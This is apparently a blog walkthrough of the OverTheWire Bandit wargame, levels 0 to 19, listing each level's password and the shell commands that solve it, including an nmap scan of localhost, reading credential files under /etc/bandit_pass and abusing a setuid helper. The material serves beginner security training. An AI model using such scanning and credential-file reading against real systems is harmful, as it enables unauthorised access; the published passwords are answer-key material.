
pass:

Not Available Yet.

OverTheWire.org Wargames – Bandit – Level 10 to Level 19

OverTheWire.org is one of the good sites offering WarGames. In this context, a WarGame is a game specifically designed to help people learn and practice security concepts in the form of a fun-filled game. One of the wargame categories provided by OverTheWire is Bandit, which is aimed at absolute beginners.

This writeup contains my solutions to the OverTheWire Bandit challenges. The solutions written here are for level 10 to level 19.

How to Play

Bandit, like other games, is organized in levels. We start playing at level 0 and try to "beat" or "finish" it. Finishing a level yields the information needed to start the next one, so every level beaten gives a clue for the next level.

There are several things you can try when you are unsure how to continue:

  • First, if you know a command, but don’t know how to use it, try the manual (man page) by entering “man <command>” (without the quotes). e.g. if you know about the “ls” command, type: man ls. The “man” command also has a manual, try it. Press q to quit the man command.
  • Second, if there is no man page, the command might be a shell built-in. In that case use the “help <X>” command. E.g. help cd
  • Also, your favorite search-engine is your friend.
  • Lastly, if you are still stuck, you can join us on IRC

Level 10

ssh bandit10@bandit.labs.overthewire.org

pass: truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk

File data.txt is plain text, but the password inside it is base64-encoded. Decoding is simple with the base64 utility.

base64 -d data.txt

Level 11

ssh bandit11@bandit.labs.overthewire.org

pass: IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR

The password is written inside data.txt. This time it is encrypted with ROT13 (a Caesar cipher): every letter in the text has been rotated by 13 positions. We can use the tr utility to reverse it.

cat data.txt | tr '[A-Za-z]' '[N-ZA-Mn-za-m]'

Level 12

ssh bandit12@bandit.labs.overthewire.org

pass: 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu

This problem is not hard, but tedious. The directions tell us that the data has been compressed several times in different ways, and we need to decompress it layer by layer. However, we cannot write to the home directory, so we use a /tmp directory to store the temporary files.

mkdir /tmp/secretbase
cp ~/data.txt /tmp/secretbase/data.txt
cd /tmp/secretbase
xxd -r data.txt > data.bin
file data.bin
mv data.bin data.gz
gzip -d data.gz
file data
mv data data.bz2
bzip2 -d data.bz2
file data
mv data data.gz
gzip -d data.gz
file data
tar -xvf data
file data5.bin
tar -xvf data5.bin
bzip2 -d data6.bin
file data6.bin.out
tar -xvf data6.bin.out
file data8.bin
mv data8.bin data8.gz
gzip -d data8.gz
file data8
cat data8
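The manual chain above can be automated. As an added example (not from the original writeup), the Python below builds a constructed blob with the same layering as the challenge, renders it as an xxd hexdump like data.txt, then peels each layer by its magic bytes, which is what the repeated file / gzip / bzip2 / tar steps do by hand. The secret and member file names are constructed for the example.

```python
import bz2, gzip, io, tarfile
SECRET = b"constructed-example-password\n"  # constructed; not the real challenge data

def tar_wrap(payload, name):
    """Wrap payload as a single-member uncompressed tar archive."""
    buf, info = io.BytesIO(), tarfile.TarInfo(name)
    info.size = len(payload)
    with tarfile.open(fileobj=buf, mode="w") as tar:
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()

def build_nested():
    """Same layering as the challenge: gzip, bzip2, gzip, tar, tar, bzip2, tar, gzip, text."""
    inner = tar_wrap(gzip.compress(SECRET), "data8.bin")
    inner = tar_wrap(bz2.compress(inner), "data6.bin")
    inner = tar_wrap(inner, "data5.bin")
    return gzip.compress(bz2.compress(gzip.compress(inner)))

def xxd_dump(data):
    """Render bytes in xxd's default layout (this is what data.txt looks like)."""
    lines = []
    for off in range(0, len(data), 16):
        chunk = data[off:off + 16]
        hexcol = " ".join(chunk[i:i + 2].hex() for i in range(0, len(chunk), 2))
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in chunk)
        lines.append(f"{off:08x}: {hexcol:<39}  {text}")
    return "\n".join(lines) + "\n"

def xxd_reverse(text):
    """Undo the dump like `xxd -r`: keep only the hex column of each line."""
    out = bytearray()
    for line in text.splitlines():
        hexcol = line.split(":", 1)[1].split("  ", 1)[0]
        out += bytes.fromhex(hexcol.replace(" ", ""))
    return bytes(out)

def unwrap(data):
    """Peel layers by magic bytes, as the repeated file + decompress/untar steps do."""
    while True:
        if data[:2] == b"\x1f\x8b":              # gzip
            data = gzip.decompress(data)
        elif data[:3] == b"BZh":                 # bzip2
            data = bz2.decompress(data)
        elif data[257:262] == b"ustar":          # tar (POSIX header magic)
            with tarfile.open(fileobj=io.BytesIO(data)) as tar:
                data = tar.extractfile(tar.getmembers()[0]).read()
        else:
            return data

DATA_TXT = xxd_dump(build_nested())  # stands in for ~/data.txt
```

Calling unwrap(xxd_reverse(DATA_TXT)) returns SECRET; on the real data.txt the loop stops when the remaining bytes match no known magic, which is the plain-text password.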

Level 13

ssh bandit13@bandit.labs.overthewire.org

pass: 8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL

It is quite simple. When we log in as bandit13, we see a private SSH key in the home directory. Supply it to the SSH client to log in as bandit14, then read /etc/bandit_pass/bandit14 to get the password for bandit14. Here is how we do that:

ssh bandit14@localhost -i sshkey.private
cat /etc/bandit_pass/bandit14

Level 14

ssh bandit14@bandit.labs.overthewire.org

pass: 4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

In this level our objective is to submit our current password to the server on port 30000. A simple command using netcat can be used here.

cat /etc/bandit_pass/bandit14 | nc localhost 30000

Level 15

ssh bandit15@bandit.labs.overthewire.org

pass: BfMYroe26WYalil77FoDi9qh59eK5xNr

Similar to level 14, we need to send our current password to port 30001. However, this time we need to use SSL.

cat /etc/bandit_pass/bandit15 | openssl s_client -quiet -connect localhost:30001

Another solution:

ncat --ssl localhost 30001
# (paste password for level15)

Level 16

ssh bandit16@bandit.labs.overthewire.org

pass: cluFn7wTiGryunymYOu4RcffSxQluehd

The directions give us a range of ports, 31000-32000. The target port speaks SSL and will return the next password if we supply our current one. First we port-scan the range to find which ports are open; we also let nmap detect service versions where possible.

nmap -p31000-32000 localhost -sV

Here we have several open ports:

Starting Nmap 6.40 ( http://nmap.org ) at 2014-12-13 23:03 UTC
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00100s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE VERSION
31046/tcp open  echo
31518/tcp open  msdtc   Microsoft Distributed Transaction Coordinator (error)
31691/tcp open  echo
31790/tcp open  msdtc   Microsoft Distributed Transaction Coordinator (error)
31960/tcp open  echo
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.31 seconds

However, 31046, 31691, and 31960 are out, since those are echo or SSH servers. The possible ones are 31518 and 31790, so we just try both of them.

cat /etc/bandit_pass/bandit16 | openssl s_client -quiet -connect localhost:31518

Port 31518 doesn't give anything back, so our hope is now 31790.

cat /etc/bandit_pass/bandit16 | openssl s_client -quiet -connect localhost:31790

We get an RSA private key. Save it as /tmp/bandit17.passkey, restrict its permissions (ssh refuses a key readable by others), then log in to bandit17 and get the password:

chmod 600 /tmp/bandit17.passkey
ssh bandit17@localhost -i /tmp/bandit17.passkey
cat /etc/bandit_pass/bandit17

Level 17

ssh bandit17@bandit.labs.overthewire.org

pass: xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn

We are given two files: password.old and password.new. The new password is on the only line that differs between the two, so we can use diff to find it.

diff password.new password.old

Level 18

ssh bandit18@bandit.labs.overthewire.org

pass: kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd

Someone has modified .bashrc to log us out immediately when we log in. Instead of opening a shell, we can give ssh a command to run at login and read the password stored in ~/readme.

ssh bandit18@bandit.labs.overthewire.org -t 'cat readme'

Level 19

ssh bandit19@bandit.labs.overthewire.org

pass: IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

In this level we are given a setuid binary in the home directory. We don't know yet what to do, so we check its usage by running it without arguments. Once we know how to run it, we can use it to read the next password.

./bandit20-do cat /etc/bandit_pass/bandit20

OverTheWire.org Wargames – Bandit – Level 0 to Level 9

OverTheWire.org is one of the good sites offering WarGames. In this context, a WarGame is a game specifically designed to help people learn and practice security concepts in the form of a fun-filled game. One of the wargame categories provided by OverTheWire is Bandit, which is aimed at absolute beginners.

This writeup contains my solutions to the OverTheWire Bandit challenges. The solutions written here are for level 0 to level 9.

Level 0

ssh bandit0@bandit.labs.overthewire.org

pass: bandit0

The simplest challenge. You only need to log in to the system via SSH. Once you are in, get the password for the next level with:

cat readme

Level 1

ssh bandit1@bandit.labs.overthewire.org

pass: boJ9jbbUNNfktd78OOpsqOltutMc3MY1

Another simple challenge. Once you are logged in, you will notice a file in the home directory named '-'. Since a lone dash is treated specially by most commands, the file needs special treatment.

cat ./-

Level 2

ssh bandit2@bandit.labs.overthewire.org

pass: CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9

Another simple challenge. Once you are logged in, you will notice a file in the home directory named "spaces in this filename" (without the quotes). Because of the spaces, the name needs extra treatment. There are two ways to solve this: put the filename in quotes, or escape each space with a backslash. Pick one.

cat "spaces in this filename"
cat spaces\ in\ this\ filename

Level 3

ssh bandit3@bandit.labs.overthewire.org

pass: UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK

There is a folder called inhere. It appears empty at first glance, but that is not the case: there is a hidden file in it.

cd inhere
ls -la
cat .hidden

Level 4

ssh bandit4@bandit.labs.overthewire.org

pass: pIwrPrtPN36QITSp3EQaw936yaFoFgAB

Again there is a directory called inhere, with a few files inside. The directions say the password is in the only human-readable file, so with the file command we can see that the only ASCII text file is "-file07". Its name starts with a dash, so we address it as ./-file07.

cd inhere
file ./*
cat ./-file07

Level 5

ssh bandit5@bandit.labs.overthewire.org

pass: koReBOKuIDDepwhWk7jZC0RTdopnAYKh

A folder with a bunch of folders inside, recursively. The directions tell us the file containing the password is 1033 bytes, so we have to find a file of exactly that size.

cd inhere
find . -type f -size 1033c
cat ./maybehere07/.file2

Another solution:

cd inhere
ls -Rla . | awk '/:$/&&f{s=$0;f=0}
    /:$/&&!f{sub(/:$/,"");s=$0;f=1;next}
    NF&&f{ print s"/"$0 }' | grep 1033

Level 6

ssh bandit6@bandit.labs.overthewire.org

pass: DXjZPULLxYr17uwoI01bNLQbtFemEgo7

Nothing in our home directory. The file is located somewhere on the server, owned by the user bandit7 and the group bandit6, and it is 33 bytes in size.

find / -type f -user bandit7 -group bandit6 -size 33c 2> /dev/null
cat /var/lib/dpkg/info/bandit7.password

Another solution:

ls -Rla / 2> /dev/null | awk '/:$/&&f{s=$0;f=0}
    /:$/&&!f{sub(/:$/,"");s=$0;f=1;next}
    NF&&f{ print s"/"$0 }' | grep -E 'bandit7 +bandit6 +33 '

Level 7

ssh bandit7@bandit.labs.overthewire.org

pass: HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs

There is a file called data.txt in our home directory. It is a huge file that we need to search through. The password is located next to the word millionth, so we can simply use grep.

grep "millionth" data.txt

Level 8

ssh bandit8@bandit.labs.overthewire.org

pass: cvX2JJa4CFALtqS87jk27qwqGhBM9plV

The password is on the only line that occurs exactly once in data.txt. We can use sort and uniq to find it.

sort data.txt | uniq -u

Level 9

ssh bandit9@bandit.labs.overthewire.org

pass: UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR

Now the data is in a binary file, which we can't easily grep through directly. However, we can run strings on it and grep the output. The directions say that the password is on one of the few lines beginning with an equal sign.

strings data.txt | grep =